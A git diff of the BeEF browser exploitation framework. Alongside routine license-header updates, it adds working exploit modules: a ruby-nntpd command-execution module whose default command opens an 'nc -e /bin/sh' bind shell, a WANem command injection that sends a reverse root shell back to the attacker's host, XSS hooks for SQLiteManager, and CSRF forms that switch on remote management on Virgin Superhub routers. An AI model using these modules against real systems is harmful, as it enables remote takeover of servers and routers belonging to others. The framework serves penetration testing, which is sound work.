-	var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
-		{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
 	]);
 
-	var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
-		{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
-		{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
+		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
 	]);
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(virgin_superhub_iframe1);
-		document.body.removeChild(virgin_superhub_iframe2);
-		document.body.removeChild(virgin_superhub_iframe3);
+		document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
index e767d9fef..b0e6077c5 100644
--- a/modules/exploits/router/virgin_superhub_csrf/config.yaml
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
index 83599490c..3d2f288cd 100644
--- a/modules/exploits/router/virgin_superhub_csrf/module.rb
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Virgin_superhub_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/command.js b/modules/exploits/ruby_nntpd_cmd_exec/command.js
new file mode 100644
index 000000000..5fcd8228d
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(nntpd_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/config.yaml b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
new file mode 100644
index 000000000..09abcc5d0
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ruby_nntpd_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "ruby-nntpd Command Execution"
+            description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/module.rb b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
new file mode 100644
index 000000000..660076af3
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
+###
+class Ruby_nntpd_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '1119'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end
diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
index 00804c652..084e32bac 100644
--- a/modules/exploits/spring_framework_malicious_jar/command.js
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	jar_file        = "<%= @jar_file %>";
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
index 1dbaace8f..5ed114fb4 100644
--- a/modules/exploits/spring_framework_malicious_jar/config.yaml
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,4 +12,4 @@ beef:
             description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/

Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)"
             authors: ["bcoles"]
             target:
-                working: ["ALL"]
+                unknown: ["ALL"]
diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb
index f1777b7f5..0138bbb5a 100644
--- a/modules/exploits/spring_framework_malicious_jar/module.rb
+++ b/modules/exploits/spring_framework_malicious_jar/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Spring_framework_malicious_jar < BeEF::Core::Command
 
diff --git a/modules/exploits/sqlitemanager_xss/command.js b/modules/exploits/sqlitemanager_xss/command.js
new file mode 100644
index 000000000..c919b9bb6
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var serendipity_iframe = beef.dom.createInvisibleIframe();
+	serendipity_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/sqlitemanager_xss/config.yaml b/modules/exploits/sqlitemanager_xss/config.yaml
new file mode 100644
index 000000000..c1cb0a5a8
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        sqlitemanager_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "SQLiteManager XSS"
+            description: "Attempts to hook SQLiteManager using XSS.
Tested on version 1.2.4 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb
new file mode 100644
index 000000000..a5e6b536d
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sqlitemanager_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"> @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/command.js b/modules/exploits/switch/netgear_gs108t_csrf/command.js
index a2f13c118..67e926e4b 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/command.js
+++ b/modules/exploits/switch/netgear_gs108t_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var base = '<%= @base %>';
   var oldpassword = '<%= @oldpassword %>';
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
index 6402686d4..cb2e1d2e7 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
+++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/module.rb b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
index e4ca0a105..ccccd03ae 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/module.rb
+++ b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Netgear_gs108t_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/vtiger_crm_upload_exploit/command.js b/modules/exploits/vtiger_crm_upload_exploit/command.js
index f95758eb6..25b6ea251 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/command.js
+++ b/modules/exploits/vtiger_crm_upload_exploit/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // VtigerCRM <= 5.0.4 "chained exploitation" PoC 
 // Hacked up for OWASP New Zealand Day, July 13th 2009
 //
diff --git a/modules/exploits/vtiger_crm_upload_exploit/config.yaml b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
index 1f10055aa..d714c7909 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/config.yaml
+++ b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/vtiger_crm_upload_exploit/module.rb b/modules/exploits/vtiger_crm_upload_exploit/module.rb
index ad2d6f0bc..f355946bf 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/module.rb
+++ b/modules/exploits/vtiger_crm_upload_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Vtiger_crm_upload_exploit < BeEF::Core::Command
   
diff --git a/modules/exploits/wanem_command_execution/command.js b/modules/exploits/wanem_command_execution/command.js
new file mode 100644
index 000000000..f8e66229e
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var wanem_iframe = beef.dom.createInvisibleIframe();
+  wanem_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,'+lhost+','+lport+',-e,/bin/sh}%26');
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wanem_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/wanem_command_execution/config.yaml b/modules/exploits/wanem_command_execution/config.yaml
new file mode 100644
index 000000000..ce2d3f2d7
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
+################################################################################
+beef:
+    module:
+        wanem_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "WAN Emulator Command Execution"
+            description: "Attempts to get a reverse root shell on a WAN Emulator server.
Tested on version 2.3 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/wanem_command_execution/module.rb b/modules/exploits/wanem_command_execution/module.rb
new file mode 100644
index 000000000..0f67e929e
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/module.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see:  http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
+################################################################################
+class Wanem_command_execution < BeEF::Core::Command
+
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
index 6a942ff85..7a0e8c0eb 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
index a43a30312..b69f3adce 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,4 +12,4 @@ beef:
             description: "Attempts to hook AlienVault OSSIM 3.1 using XSS.
For more information see: http://www.exploit-db.com/exploits/20062/"
             authors: ["bcoles", "muts"]
             target:
-                working: ["ALL"]
+                unknown: ["ALL"]
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
index abcf44b8c..bbcc39d2f 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
@@ -1,24 +1,15 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Alienvault_ossim_3_1_xss < BeEF::Core::Command
 
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 
 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url='}
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
index 81933f79a..1da723675 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
index 3320a74f6..b93a2c26b 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,4 +12,4 @@ beef:
             description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/"
             authors: ["bcoles", "s4squatch"]
             target:
-                working: ["ALL"]
+                unknown: ["ALL"]
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
index f0e42f7df..cc8d0732a 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -1,24 +1,15 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
